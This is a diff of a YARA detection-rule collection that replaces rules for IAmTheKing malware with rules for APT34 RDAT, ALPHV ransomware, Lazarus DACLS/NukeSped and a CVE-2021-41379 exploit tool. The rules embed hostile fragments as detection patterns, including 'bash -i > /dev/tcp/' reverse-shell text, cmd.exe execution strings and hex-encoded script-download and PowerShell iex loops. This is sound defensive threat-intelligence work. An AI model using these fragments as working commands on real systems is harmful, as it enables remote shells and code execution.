+		$s6 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 57 53 63 72 69 70 74 2E 53 68 65 6C 6C 22 29 }
+		$s7 = { 63 72 65 61 74 65 6F 62 6A 65 63 74 28 22 4D 69 63 72 6F 73 6F 66 74 2E 58 4D 4C 48 54 54 50 22 29 }
+		$s8 = { 2E 45 6E 76 69 72 6F 6E 6D 65 6E 74 28 22 50 52 4F 43 45 53 53 22 29 28 22 50 72 6F 67 72 61 6D 57 36 34 33 32 22 29 20 3D 20 22 22 }
+		$s9 = { 3A 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 53 63 72 69 70 74 69 6E 67 2E 46 69 6C 65 53 79 73 74 65 6D 4F 62 6A 65 63 74 22 29 2E 44 65 6C 65 74 65 66 46 69 6C 65 20 57 73 63 72 69 70 74 2E 53 63 72 69 70 74 46 75 6C 6C 4E 61 6D 65 2C 20 54 72 75 65 3E 22 }
+		$s10 = { 20 65 63 68 6F 20 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 63 73 63 72 69 70 74 2E 65 78 65 }
+		$s11 = { 22 5E 26 64 65 6C 20 22 25 7E 66 30 22 3E }
+		$s12 = { 2E 52 75 6E 20 22 72 65 67 73 76 72 33 32 2E 65 78 65 20 2F 73 20 }
+		$s13 = { 2E 54 79 70 65 20 3D 20 31 3A 2E 4F 70 65 6E 3A 2E 57 72 69 74 65 20 42 69 6E 61 72 79 3A 2E 50 6F 73 69 74 69 6F 6E 20 3D 20 30 3A 2E 54 79 70 65 20 3D 20 32 3A 2E 43 68 61 72 53 65 74 20 3D 20 22 75 73 2D 61 73 63 69 69 22 }
+		$s14 = { 2E 4F 70 65 6E 20 22 47 45 54 22 2C 20 }
+		$s15 = { 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 }
+		$URL1 = { 22 68 74 74 70 3A 2F 2F 74 ?? ?? ?? }
+		$URL2 = { 22 68 74 74 70 73 3A 2F 2F 74 ?? ?? ?? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 25KB and 5 of ( $s* )
+		uint16( 0 ) == 0x33c9 and filesize < 3KB and ( 1 of ( $URL* ) ) and ( 12 of ( $s* ) )
 }
-rule ARKBIRD_SOLG_MAL_Queenofclubs_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT34_RDAT_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect QueenOfClubs malware"
+		description = "Detect Installer from APT34 group"
 		author = "Arkbird_SOLG"
-		id = "d78df760-5753-528c-b03d-7bb91ec658c0"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfClubs_Jul_2021_1.yara#L1-L21"
+		id = "32f28376-e792-543b-82f7-36ec627b4fab"
+		date = "2021-02-26"
+		modified = "2021-02-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-26/APT34/APT_APT34_RDAT_Feb_2021_1.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "c6fe9dd24098ef3c281d9e6727613499988c88b9d2011af77390e0ce358bebf4"
-		score = 75
-		quality = 75
+		logic_hash = "61ea6eceda0c7d6ec15db87891c4322002c112383c7a4d0089e35db9636bbe73"
+		score = 50
+		quality = 73
 		tags = "FILE"
-		hash1 = "b0a1da4fc5526365df495094f65660d88487ce5e60192e5fb4075e815f9481d3"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		level = "experimental"
+		hash1 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c"
 
 	strings:
-		$s1 = { 66 00 6f 00 72 00 28 00 3b 00 3b 00 29 00 7b 00 24 00 53 00 3d 00 47 00 65 00 74 00 2d 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 20 00 22 00 25 00 73 00 22 00 3b 00 49 00 46 00 28 00 24 00 53 00 29 00 7b 00 22 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 69 00 65 00 78 00 20 00 24 00 53 00 20 00 32 00 3e 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 24 00 74 00 2b 00 27 00 20 00 27 00 3b 00 65 00 63 00 68 00 6f 00 20 00 24 00 74 00 20 00 3e 00 3e 00 22 00 25 00 73 00 22 00 3b 00 7d 00 73 00 6c 00 65 00 65 00 70 00 20 00 2d 00 6d 00 20 00 36 00 30 00 30 00 3b 00 7d }
-		$s2 = { 50 00 6f 00 77 00 65 00 72 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 2d 00 6e 00 6f 00 70 00 20 00 2d 00 63 00 20 00 25 00 73 }
-		$s3 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
-		$s4 = { 5c 00 7e 00 74 00 6d 00 70 00 5f 00 [6-20] ( 00 2e 00 6a 00 70 00 67 | 00 2e 00 70 00 73 00 31) }
-		$s5 = { c7 45 d8 ac 89 41 00 c7 45 dc 00 00 00 00 6a 01 68 00 00 40 04 8d 55 d8 52 68 c8 89 41 00 68 e0 89 41 00 8b 45 c0 83 c0 08 50 68 ec 89 41 00 8b 4d f4 51 ff 15 78 62 41 00 8b 55 c0 89 42 04 8b 45 c0 83 78 04 00 75 19 8b 4d f0 51 ff 15 74 62 41 00 8b 55 f4 52 ff 15 74 62 41 00 e9 14 ff ff ff 68 3c 04 00 00 e8 b7 70 00 00 83 c4 04 89 45 d0 8b 45 d0 89 45 e0 68 ec 01 00 00 e8 a1 70 00 00 83 c4 04 89 45 cc 8b 4d cc 89 4d d4 8b 55 c0 8b 32 b9 7b 00 00 00 8b 7d d4 f3 a5 6a 01 8b 45 c0 83 c0 1c 50 68 ec 01 00 00 8b 4d d4 51 68 c1 f5 09 00 8b 55 c0 83 c2 20 52 e8 04 ef ff ff }
-		$s6 = "http://bot.google.com" fullword ascii
-		$s7 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 00 00 25 00 73 00 00 00 00 00 25 00 73 }
+		$s1 = "XAVVQxcVAVIfCBYWARQfEBldEU4ZF1JbUFJYCgpCTg==" fullword ascii
+		$s2 = { 0b da 89 5c 24 40 40 38 3d 55 56 }
+		$s3 = { 57 4e 44 31 23 31 2e 32 }
+		$s4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 63 }
+		$seq_Service = { 4c 8b dc 57 48 81 ec e0 02 00 00 48 c7 44 24 70 fe ff ff ff 49 89 5b 10 49 89 73 18 48 8b 05 65 12 0a 00 48 33 c4 48 89 84 24 d0 02 00 00 48 8b d9 48 89 4c 24 78 41 b8 04 01 00 00 49 8d 93 d8 fd ff ff 33 c9 ff 15 9d 20 07 00 85 c0 75 19 ff 15 33 21 07 00 8b d0 48 8d 0d 8a b6 08 00 e8 1d f7 ff ff e9 a5 01 00 00 33 f6 48 89 b4 24 90 00 00 00 48 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 d4 9f ff ff 66 39 b4 24 c0 00 00 00 75 05 44 8b c6 eb 1f 48 8d 84 24 c0 00 00 00 49 83 c8 ff 66 0f 1f 84 00 00 00 00 00 49 ff c0 66 42 39 34 40 75 f6 48 8d 94 24 c0 00 00 00 48 8d 8c 24 80 00 00 00 e8 41 05 00 00 90 4c 8b c3 48 8d 8c 24 a0 00 00 00 e8 60 0a 00 00 90 49 83 c9 ff 45 33 c0 48 8b d0 48 8d 8c 24 80 00 00 00 e8 a8 07 00 00 90 45 33 c0 b2 01 48 8d 8c 24 a0 00 00 00 e8 55 9f ff ff 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 d5 1e 07 00 48 8b f8 48 85 c0 75 19 ff 15 5f 20 07 00 8b d0 48 8d 0d de b5 08 00 e8 49 f6 ff ff e9 be 00 00 00 4c 8d 8c 24 80 00 00 00 48 83 bc 24 98 00 00 00 08 4c 0f 43 8c 24 80 00 00 00 48 8d 15 33 7a 0a 00 4c 8b c2 48 83 3d 40 7a 0a 00 08 4c 0f 43 05 20 7a 0a 00 48 0f 43 15 18 7a 0a 00 48 89 74 24 60 48 89 74 24 58 48 89 74 24 50 48 89 74 24 48 48 89 74 24 40 4c 89 4c 24 38 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 41 b9 ff 01 0f 00 48 8b c8 ff 15 23 1e 07 00 48 8b f0 48 85 c0 75 16 ff 15 bd 1f 07 00 8b d0 48 8d 0d 5c b5 08 00 e8 a7 f5 ff ff eb 15 48 8d 0d 6e b5 08 00 e8 99 f5 ff ff 48 8b ce ff 15 e0 1d 07 00 48 8b cf ff 15 d7 1d 07 00 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 54 9e ff ff 90 45 33 c0 b2 01 48 8b cb e8 46 9e ff ff 48 8b 8c 24 d0 02 00 00 48 33 cc e8 d6 94 02 00 4c 8d 9c 24 e0 02 00 00 49 8b 5b 18 49 8b 73 20 49 8b e3 5f }
+		$seq_ConnectC2 = { 33 c0 48 89 44 24 70 48 89 44 24 78 66 89 7c 24 70 8d 48 35 ff 15 2f 62 07 00 66 89 44 24 72 48 8b cb e8 ea dc ff ff 48 8b c8 ff 15 29 62 07 00 89 44 24 74 49 8b cd e8 d5 dc ff ff 48 8b d0 c7 44 24 28 10 00 00 00 48 8d 44 24 70 48 89 44 24 20 45 33 c9 45 8b 45 10 49 8b cc ff 15 e0 61 07 00 83 f8 ff 75 12 45 33 c0 48 8d 15 6b cb 08 00 48 8b ce e8 79 de ff ff 4c 89 a4 24 a8 00 00 00 c7 84 24 a0 00 00 00 01 00 00 00 48 c7 44 24 38 0a 00 00 00 41 8d 4c 24 01 48 8d 44 24 38 48 89 44 24 20 45 33 c9 45 33 c0 48 8d 94 24 a0 00 00 00 ff 15 aa 61 07 00 83 f8 01 0f 94 c0 84 c0 0f 84 0f 01 00 00 45 33 c9 41 b8 00 02 00 00 48 8d 94 24 b0 02 00 00 49 8b cc ff 15 72 61 07 00 4c 63 c0 85 c0 0f 8e ea 00 00 00 41 8b c8 49 8b d0 49 8b c0 45 85 c0 0f 8e d8 00 00 00 0f 1f 44 00 00 80 bc 04 b0 02 00 00 00 0f 85 b7 00 00 00 48 3b d0 0f 84 ae 00 00 00 85 c9 0f 84 b4 00 00 00 83 c1 03 41 3b c8 0f 8d a8 00 00 00 48 8d 9c 24 b0 02 00 00 48 03 da 48 63 c1 48 8d bc 24 b0 02 00 00 48 03 f8 4c 89 b4 24 90 00 00 00 4c 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 0a dd ff ff 48 3b fb 74 17 48 2b df 4c 8b c3 48 8b d7 48 8d 8c 24 80 00 00 00 e8 6f dd ff ff 90 48 8d 84 24 80 00 00 00 48 3b f0 74 18 49 83 c9 ff 45 33 c0 48 8d 94 24 80 00 00 00 48 8b ce e8 2a de ff ff 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 b7 dc ff ff 48 8b 5c 24 48 bf }
+		$seq_RegisterEvent = { 40 53 48 83 ec 20 48 83 3d 5a 79 0a 00 08 48 8d 1d 3b 79 0a 00 48 8b cb 48 8d 15 91 01 00 00 48 0f 43 0d 29 79 0a 00 ff 15 93 1d 07 00 48 89 05 44 77 0a 00 48 8b c8 48 85 c0 75 2d 48 83 3d 24 79 0a 00 08 48 0f 43 1d 04 79 0a 00 48 8b d3 ff 15 7b 1d 07 00 48 85 c0 74 62 48 8b c8 ff 15 35 1d 07 00 48 83 c4 20 5b c3 33 c0 c7 05 db 76 0a 00 10 00 00 00 48 89 05 e0 76 0a 00 48 8d 15 cd 76 0a 00 8b 05 17 1c 0a 00 89 05 d5 76 0a 00 ff c0 89 05 09 1c 0a 00 48 c7 05 b2 76 0a 00 02 00 00 00 c7 05 bc 76 0a 00 b8 0b 00 00 ff 15 06 1d 07 00 48 83 c4 20 5b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 35KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of ( $s* ) and 2 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Slothfulmedia_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_ALPHV_Dec_2021_1 : FILE
 {
 	meta:
-		description = "Detect SlothfulMedia malware"
+		description = "Detect AlphV ransomware (Nov and Dec 2021)"
 		author = "Arkbird_SOLG"
-		id = "f4e1eca6-ecc9-5911-b69e-c8c4de43f1a1"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_SlothfulMedia_Jul_2021_1.yara#L1-L26"
+		id = "5c758dc9-b1dc-58e0-b443-6f78e27ffefe"
+		date = "2021-12-09"
+		modified = "2021-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-09/RAN_ALPHV_Dec_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "929364cbb9854336641590d53ee9c4548f02845e26252d359b155e4c2b1032ca"
+		logic_hash = "416ebea98f660dd9fad27c3be0c79e47bc69e08fe4be7db76a71462d2c5ada49"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb"
-		hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae"
-		hash3 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		hash1 = "3d7cf20ca6476e14e0a026f9bdd8ff1f26995cdc5854c3adb41a6135ef11ba83"
+		hash2 = "7e363b5f1ba373782261713fa99e8bbc35ddda97e48799c4eb28f17989da8d8e"
+		hash3 = "cefea76dfdbb48cfe1a3db2c8df34e898e29bec9b2c13e79ef40655c637833ae"
+		hash4 = "731adcf2d7fb61a8335e23dbee2436249e5d5753977ec465754c6b699e9bf161"
+		tlp = "white"
+		adversary = "BlackCat"
 
 	strings:
-		$s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
-		$s2 = "\\VarFileInfo\\Translation" fullword wide
-		$s3 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 }
-		$s4 = "\\SetupUi" fullword wide
-		$s5 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 }
-		$s6 = { 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 25 00 73 00 25 00 64 }
-		$s7 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 }
-		$s8 = { 45 00 72 00 61 00 20 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3a 00 25 00 73 00 20 00 25 00 64 }
-		$s9 = "ExtKeyloggerStart" fullword ascii
-		$s10 = "ExtKeyloggerStop" fullword ascii
-		$s11 = "ExtServiceDelete" fullword ascii
+		$s1 = { ff b4 24 [2] 00 00 6a 00 ff 35 ?? e1 ?? 00 e8 [3] 00 8d 8c 24 [2] 00 00 ba [3] 00 68 c0 1f 00 00 e8 [3] ff 83 c4 04 ?? bc 24 [2] 00 00 }
+		$s2 = { 85 f6 74 47 8b 3d ?? e1 ?? 00 85 ff 0f 85 81 00 00 00 eb 60 68 [3] 00 6a 00 6a 00 e8 [2] 04 00 85 c0 0f 84 99 01 00 00 89 c1 31 c0 f0 0f b1 0d ?? e1 ?? 00 0f 84 f0 fe ff ff 89 c6 51 e8 [2] 04 00 89 f1 e9 e1 fe ff ff 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 32 03 00 00 89 c6 a3 ?? e1 ?? 00 8b 3d ?? e1 ?? 00 85 ff 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 09 03 00 00 89 c7 a3 ?? e1 ?? 00 89 74 24 18 e8 [2] 04 00 8b 35 ?? e1 ?? 00 89 44 24 14 85 f6 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 b8 01 00 00 89 c6 a3 ?? e1 ?? 00 8d 44 24 70 c7 44 24 64 00 00 00 00 c7 44 24 60 00 00 00 00 68 0c 01 00 00 6a 00 50 e8 [2] 04 00 83 }
+		$s3 = { 8b 38 89 4d ec 89 55 ?? 74 34 a1 ?? e1 ?? 00 85 c0 75 0e e8 [3] 00 85 c0 74 14 a3 ?? e1 ?? 00 53 6a 00 50 e8 [3] 00 89 c6 85 c0 75 13 89 d9 ba 01 00 00 00 e8 [3] ff 0f 0b be 01 00 00 00 53 57 56 e8 [3] 00 83 c4 0c 8d 04 1e 8d 4d }
+		$s4 = { 83 c4 0c c7 45 ?? 00 00 00 00 c7 45 ?? 02 00 00 89 89 75 ?? 8d 45 ?? c7 45 ?? 00 00 00 00 c7 45 ?? 00 00 00 00 6a 10 50 57 e8 [3] 00 83 f8 ff 0f 84 ?? 02 00 00 f6 45 9c ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 8 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 300KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_2 : FILE
+rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Dacls_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect PowerPool malware (ALPC exploit variant)"
+		description = "Detect DACLS malware used by APT Lazarus"
 		author = "Arkbird_SOLG"
-		id = "2988e9a8-da43-51fb-bd39-44aa1d161120"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_2.yara#L1-L23"
+		id = "fb85b83a-4367-5f1d-be06-8a8e906b8df7"
+		date = "2020-06-11"
+		modified = "2020-06-12"
+		reference = "https://twitter.com/batrix20/status/1270924079826997248"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L3-L26"
 		license_url = "N/A"
-		logic_hash = "07d7a6444ddccbf4887de18659147354c9961092bb07ee0148392035a6d27086"
+		logic_hash = "ed3e4a7a0490c5e8854d4e1bc8a223658ab9657a03c1b237af1056293a51611b"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		hash1 = "035f97af0def906fbd8f7f15fb8107a9e852a69160669e7c0781888180cd46d5"
-		hash2 = "a72cdb6be7a967d3aa0021d2331b61af84455539e6f127720c9aac9b8392ec24"
-		hash3 = "df7b9d972ac83cc4a590f09d74cb242de3442cc9c1f19ed08f62bd6ebc9fc0fd"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		hash1 = "2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b"
 
 	strings:
-		$s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
-		$s2 = { 2f 00 3f 00 69 00 64 00 3d 00 25 00 73 00 26 00 69 00 6e 00 66 00 6f 00 3d 00 25 00 73 }
-		$s3 = { 72 00 61 00 72 00 2e 00 65 00 78 00 65 00 20 00 61 00 20 00 2d 00 72 00 20 00 25 00 73 00 2e 00 72 00 61 00 72 00 20 00 2d 00 74 00 61 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 20 00 2d 00 74 00 62 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 }
-		$s4 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 24 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 54 00 61 00 62 00 6c 00 65 00 2e 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 }
-		$s5 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 }
-		$s6 = { 83 c4 04 53 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 0c 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 08 83 7c 24 20 00 68 40 01 00 00 74 61 33 ed 55 68 88 ?? 43 00 e8 ?? a4 00 00 b8 50 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 3b cd 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 3b cd 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 90 ?? 42 00 f3 a4 e8 [2] 00 00 83 c4 04 33 f6 89 74 24 20 eb 66 6a 00 68 88 ?? 43 00 e8 ?? a4 00 00 b8 f0 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 85 c9 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 85 c9 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 98 ?? 42 00 f3 a4 e8 ?? 95 00 00 c7 44 24 24 01 00 00 00 8b 74 24 24 83 c4 04 33 ed 68 d0 07 00 00 a3 d4 ?? 42 00 }
+		$s1 = "bash -i > /dev/tcp/" fullword ascii
+		$s2 = "__mh_execute_header" fullword ascii
+		$s3 = "/bin/bash -c \"" fullword ascii
+		$s4 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" fullword ascii
+		$s5 = "@_gethostbyname" fullword ascii
+		$s6 = "@_gethostname" fullword ascii
+		$s7 = "radr://5614542" fullword ascii
+		$s8 = "sh -c \"" fullword ascii
+		$s9 = "content-type: multipart/form-data" fullword ascii
+		$s10 = "@___stack_chk_fail" fullword ascii
+		$s11 = "/usr/lib/libSystem.B.dylib" fullword ascii
+		$s12 = "@dyld_stub_binder" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of ( $s* )
+		uint16( 0 ) == 0xfacf and filesize < 200KB and 10 of them
 }
-rule ARKBIRD_SOLG_MAL_Jackofhearts_Jul_2021_1 : FILE
+
+rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Nukesped_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect JackOfHearts malware"
+		description = "Detect NukeSped malware used by APT Lazarus"
 		author = "Arkbird_SOLG"
-		id = "42d5eadb-dd94-5a15-8a0d-d1e56b58ce2e"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_JackOfHearts_Jul_2021_1.yara#L1-L23"
+		id = "7a5b27df-43bd-544d-8d0f-72e58ce3064c"
+		date = "2020-06-11"
+		modified = "2020-06-12"
+		reference = "https://twitter.com/batrix20/status/1270924079826997248"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L28-L54"
 		license_url = "N/A"
-		logic_hash = "6cad69beb7c104ef19beb26ca42b923283a0303c230e30b48dde58f88af4cd42"
+		logic_hash = "b1332eb255f8ae9ae6a68ef8ef86d9f5472584cae8161c27186e341990df7eae"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		hash1 = "90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b"
 
 	strings:
-		$s1 = "%appdata%" fullword ascii
-		$s2 = "%temp%" fullword ascii
-		$s3 = { 43 3a 5c 55 73 65 72 73 5c [2-10] 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c }
-		$s4 = "CreateServiceA" fullword ascii
-		$s5 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
-		$s6 = "\\VarFileInfo\\Translation" fullword wide
-		$s7 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 }
-		$s8 = "\\SetupUi" fullword wide
-		$s9 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 }
-		$s10 = "%s.tmp" fullword wide
+		$s1 = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" fullword wide
+		$s2 = "<htr<jtb<lt6<tt&<wt" fullword ascii
+		$s3 = "Content-Disposition: form-data; name=\"file\"; filename=\"%s\"" fullword ascii
+		$s4 = "Content-Type: multipart/form-data; boundary=" fullword wide
+		$s5 = "POST" fullword ascii
+		$s6 = "Content-Type: octet-stream" fullword ascii
+		$s7 = "CONOUT$" fullword ascii
+		$s8 = "cmd.exe /c" fullword ascii
+		$s9 = "2>&1" fullword ascii
+		$s10 = "WINHTTP.dll" fullword ascii
+		$s11 = "WinHttpSendRequest" fullword wide
+		$s12 = "ObtainUserAgentString" fullword ascii
+		$s13 = "WS2_32.dll" fullword ascii
+		$s14 = "WinHttpReceiveResponse" fullword ascii
+		$s15 = "GetLogicalDrives" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 7 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "c8379f0eeeb3a522f1dd75aa5f1500b0" or 12 of them )
 }
-rule ARKBIRD_SOLG_Tool_Screencapture_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_3 : CVE_2021_41379 FILE
 {
 	meta:
-		description = "Detect Screen Capture utility"
+		description = "Detect exploit tool using CVE-2021-41379 (variant 3)"
 		author = "Arkbird_SOLG"
-		id = "09e4295e-454a-519a-964e-c5295e603aef"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/Tool_ScreenCapture_Jul_2021_1.yara#L1-L19"
+		id = "c82578d6-63ca-50f6-b105-321791ec8808"
+		date = "2021-11-26"
+		modified = "2021-11-29"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_3.yara#L1-L27"
 		license_url = "N/A"
-		logic_hash = "dff6c722ec001f5e3b5c53b41f8d457ab69ae46316f5dc7bbf1d00eb3d1ed3c8"
+		logic_hash = "559c4ca0e9ac60e3dd7d5b9a8eb22d887b0b436d4e1fc528e05e7a33ecce0aa6"
 		score = 75
-		quality = 73
-		tags = "FILE"
-		hash1 = "f441e6239b592ac15538a8ba8903e5874283b066050a5a7e514ce33e84237f4e"
-		tlp = "White"
